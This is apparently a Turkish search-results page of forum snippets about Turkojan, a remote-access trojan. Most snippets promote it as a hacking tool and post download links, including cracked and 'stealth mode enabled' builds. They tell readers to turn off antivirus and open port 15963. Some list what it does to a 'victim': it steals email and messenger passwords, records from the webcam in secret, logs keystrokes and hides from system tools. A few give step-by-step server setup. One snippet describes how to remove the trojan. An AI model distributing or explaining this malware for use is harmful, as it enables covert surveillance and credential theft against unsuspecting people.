× "

turkojan 4 indir gezginler

" arama sonuçları

turkojan 4.0 gold edition :)

  turkojan bilen bilir bilmeyen araştırır ögrenir  dowload linki =  http://www.netload.in/dateid1johbhsug/turkojan4.rar.htm programdan bir resim ./ ...

turkojan 4 + crack full !!

turkojan nedir? turkojan microsoft windows tabanlı işletim sistemlerini yönetim ve denetim amaçlı yazılmış,bir uzaktan yönetim ve denetim programıdır.program yardımı ile bağlandığınız bilgisayarları kolaylıkla kontrol edebilir ve takip edebilirsiniz.programın hukuka aykırı kullanımı yasaktır,bu konuda bilgi almak için yardım sayfasını inceleyebilirsiniz.programın hukuka ayıkırı kullanılıp amacından saptırılması halinde program yazarı ve ilgili site yöneticileri sorumlu tutulamaz.eğer kullanım koşullarını kabul etmiyorsanız lütfen programı bilgisayarınıza yüklemeyiniz. turkojan 4.0 geliştirilmiş şifre yöneticisi sayesinde bilgisayarda kayıtlı şifrelerin neredeyse tamamına yakınını alabilmektedir. turkojan'ın alab...

turkojan4

benim çok beğendiğim çok güzel bir hacker programı. programla karşı tarafın bilgisayarında aklınıza gelebilecek herşeyi yapabilirsiniz. kullanamayan arkadaşlar yorum kısmı açık ordan yardım isteyebilirler. yardımlarımı esirgemeyeceğim. takıldığınız bir yer olursa yazın. hayırlı hackler. by lordguard download <a href="http://uploading.com/files/bbme2cf4/turkojan_4_premium.rar/">turkojan_4_premium.rar - 1.8 Мb</a>   download <a href="http://www.4shared.com/file/d1osıtny/turkojan4_portable.html" target=_blank>turkojan4_portable.rar</a> ...

turkojan nedir

amatör arkadaşlar için tavsiye edebileceğim gzl türkçe programlardan biri http://rapidshare.com/files/14047606...tion_.exe.html unutmayın arkadaşlar programları anti-virüs programlarını kapatmadan kuramassınız . turkojan nedir turkojan bir remote administrator tool'dur. turkojan ile server bulaştırdığınız bilgisayarlarda tam kontrol hakkına erişirsiniz. 2-) turkojanle neler yapılabilir? turkojan ile server bulaştırdığınız bilgisayarda (kurban) %100 kontrol hakkına erişirsiniz. genel olarak; -kurbanın mail şifrelerini alabilirsiniz. -kurbanın msn şifrelerini alabilirsiniz. -kurbanın ıcq/aım/yahooım şifrelerini alabilirsiniz. -kurbanın web kamerasını gizlice açabilir, görüntü kaydedebilirsini...

turkojan 4 gold edition dowland

turkojan 4 gold edition dowlandresim:  http://files.fmkhackers.webnode.com/200000379-b4fdfb5f83/turkojan%204.jpglink:  http://rapidshare.com/files/305630830/turkojan_client_v4.0__gold_edition_-bug_fiexd.rar.htmlorjinal siteden indirdiğinizde.gizli mod kapalıdır. benim verdiğimde gizli mod açıktır. ( gold edition ) dur. :)15963 portunu açmayı unutmayın....

pc hacklemek bukadar kolaymıydı. turkojan 4.0 videolu anlatım

turkojan v 4.0 kullanabilmek için yapmanız gerekenler :turkojan v 4.0 ı indirmek için http://www.turkojan.com/downloads/turkojan4.exe tıklayın.bunu indirdikten sonra kurun ve bunları uygulayın videoları izlemede hiç bişey yapmayın.uygulama yapmazsanız program hiçbi işe yaramaz..15963 no lu porttan içeri dalacaz bunun için kesinlikle videoları izleyin ve modeminizdeki işlemleri halledin1. modeminizden portları açma :yönetim programı olan client ve bağlanmak istediğiniz bilgisayarda çalışacak olan server arasında sağlıklı veri alışverişini amacıyla modeminizin 15963 no lu portunu açmanız gerekmektedir.tüm modemlerde 15963 portunun açılması resimli anlatım olarak <a http://www.turkojan.net/modemde-port-acma başlığı altında verilmiştir.portu açtıktan sonra test port ile test ettiğinizde hal...

turkojan 3.0

turkojan 3.0özellikleri +reverse connection(ters bağlantı)+bilgisayardaki şifreleri alabilme+serverla chat yapabilme+server’a sahte hata mesajları gönderebilme+gelişmiş dosya yöneticisi+karşı bilgisyarda dosya arama+karşı bilgisayarın ekran çözünürlüğünü değiştirebilme+karşı bilgisayarın ekranına yazı yazabilme+fare yöneticisi+karşı bilgisayar hakkında bilgi+clipboard yöneticisi+saat/tarih ayarlama+ıe ayarları+çalışan uygulamalar+servis yöneticisi+klavye yöneticisi+klavyeyi kontrol edebilme+online keylogger+offline keylogger+eğlence menüsü+yazıcıdan çıktı alabilme+windows renklerini değiştirebilme+registry yöneticisi+ekran görüntüsü alabilme+webcam’den görüntü alabilme+netstatda/dosya aramalarında/regeditde/msconfigde görünmemebilgisayardaki şifreler;-----------------------turk...

turkojan dan kurtulun

kendi denediğim bir yöntemle turkojandan kurtulun...bilgisayar açılırken internete bağlı olduğunuzda antivirüs " cmsetac.dll "dosyasını buluyor ve sildiğinizde bil. restart yapıyorsa sizdede turkojan  vardır..kurtulmak için sizde deneyebilirsiniz(kaspersky antivirüs tavsitemdir)1-bilgisayarı  internete bağlı durumda açın.2-antivirüsün bulduğu cmsetac.dll dosyasını silmeyin ve izin verin.(skip)3-bilgisayarınızda mstwain32.exe dosyasını aratın fakat silmeyin.(zaten çalışırken silmeye karşı    korumalı olacaktır.)4-ctrl+alt+del yapın ve işlemler menüsünde mstwain.exe programının çalıştığını kontrol                    edin.(zaten yukarıdaki işlemleri yaptıysanız çalışacaktır.)...

turkojan 4 çıktı... rekora ulaşıyor........

turkojan nedir? turkojan microsoft windows tabanlı işletim sistemlerini yönetim ve denetim amaçlı yazılmış,bir uzaktan yönetim ve denetim programıdır.program yardımı ile bağlandığınız bilgisayarları kolaylıkla kontrol edebilir ve takip edebilirsiniz.programın hukuka aykırı kullanımı yasaktır,bu konuda bilgi almak için yardım sayfasını inceleyebilirsiniz.programın hukuka ayıkırı kullanılıp amacından saptırılması  halinde program yazarı ve ilgili site yöneticileri sorumlu tutulamaz.eğer kullanım koşullarını kabul etmiyorsanız lütfen programı bilgisayarınıza yüklemeyiniz. turkojan 4 indir : http://www.turkojan.com/sayac/click.php?id=9   turkojan 4.0 yenilikler         yenilikler turkojan 4 e eklenilen mük...

turkojan client 3.0

 gelişmiş dosya yöneticisi:turkojan; çok gelişmiş dosya yöneticisi ile kurbanınızın bilgisayarını sizin hizmetinize sunmaktadır,dosya yönetici sayesindekarşı bilgisayara dosya gönderebilir karşı bilgisayardan dosya çekebilirsiniz.kısayol tuşları sayesinde çaba sarf etmeden klasörden klasöre atlayabilirsiniz,aynı zamanda herhangi bir programı gizli yada görünür olarak çalıştırabilir,kurbanın metindosyalarını download etmeden okuyabilir,istediğiniz dosyayı yada klasörü tek tıklama ile silebilirsiniz.gelişmiş zipleme seçenekleri sayesinde klasörün tamamını yada dosyaları tek tek zipleyip download esnasında zamandan tasarruf edebilirsiniz.aynı zamanda karşı bilgisayarda müzik dosyası çalabilir,bilgisayarın duvarkağıdını değiştirebilirsiniz.fare yöneticisi:fare yöneticisi ile farenin ayarl...

turkojan 3 çıktı!

turkojan 3.0 özellikleri -------------------------arkadaşlar uzun zamandır beklediğiniz turkojan'ın son sürümü yayınlandı,güle güle kullanın..http://www.turkojan.comturkojan 3.0 özellikleri -------------------------+reverse connection(ters bağlantı)+bilgisayardaki şifreleri alabilme+serverla chat yapabilme+server'a sahte hata mesajları gönderebilme+gelişmiş dosya yöneticisi+karşı bilgisyarda dosya arama+karşı bilgisayarın ekran çözünürlüğünü değiştirebilme+karşı bilgisayarın ekranına yazı yazabilme+fare yöneticisi+karşı bilgisayar hakkında bilgi+clipboard yöneticisi+saat/tarih ayarlama+ıe ayarları+çalışan uygulamalar+servis yöneticisi+klavye yöneticisi+klavyeyi kontrol edebilme+online keylogger+offline keylogger+eğlence menüsü+yazıcıdan çıktı alabilme+windows renklerini değiştirebi...

turkojan 2.0 kullanımı

turkojan 2.0 kullanımı bu bölümde sizlere server editor le ilgili bilgiler vericemyanlız turkojan 2.0 ı kullanmak isteyen arkadaşlar bir uyarıyapmak istiyorum.turkojan 2.0 her ne kadar trojan sınıfında olsada programın özelikleri eğitim amaçlı ve kendinize ait uzaktaki bilgisayarlara güvenli şekilde ulaşabilmeniz için yapılmıştır.nasıl ve ne kadar güvenli olduğunu serveri oluşturuken anlatıcam.turkojan 2.0 ı kötü amaçlı kulanılması ve sistemlere zarar vermesiprogramı yapan ve anlatan kişinin sorumluğu altında deildir. 1-önce kurban ın adı bölümüne girmek istediğimiz bilgisayarın adını yazıyoruz. 2-dns/ıp bölümü bahsettiğim güvenli giriş i sağlayan sebeplerden birtanesi dirturkojan 2.0 kulanmak isteyen kişi eğer sabit internet ıp sine saip deilse programı servere yazılan ıp deişene kada...

turkojan 2.0(detayli anlatim)

arkadaslar hiçbir yerde bu konu doğru dürüs anlatılmamış alın size linki ve kullanımı;http://rapidshare.de/files/5237199/turkojantr.zipkullanımı:bu bölümde sizlere server editor le ilgili bilgiler vericemyanlız turkojan 2.0 ı kullanmak isteyen arkadaşlar bir uyarıyapmak istiyorum.turkojan 2.0 her ne kadar trojan sınıfında olsada programın özelikleri eğitim amaçlı ve kendinize ait uzaktaki bilgisayarlara güvenli şekilde ulaşabilmeniz için yapılmıştır.nasıl ve ne kadar güvenli olduğunu serveri oluşturuken anlatıcam.1-önce kurban ın adı bölümüne girmek istediğimiz bilgisayarın adını yazıyoruz.2-dns/ıp bölümü bahsettiğim güvenli giriş i sağlayan sebeplerden birtanesi dirturkojan 2.0 kulanmak isteyen kişi eğer sabit internet ıp sine saip deilse programı servere yazılan ıp deişene kadar k...

Arkadaşların Burada !
Arkadaşların Burada !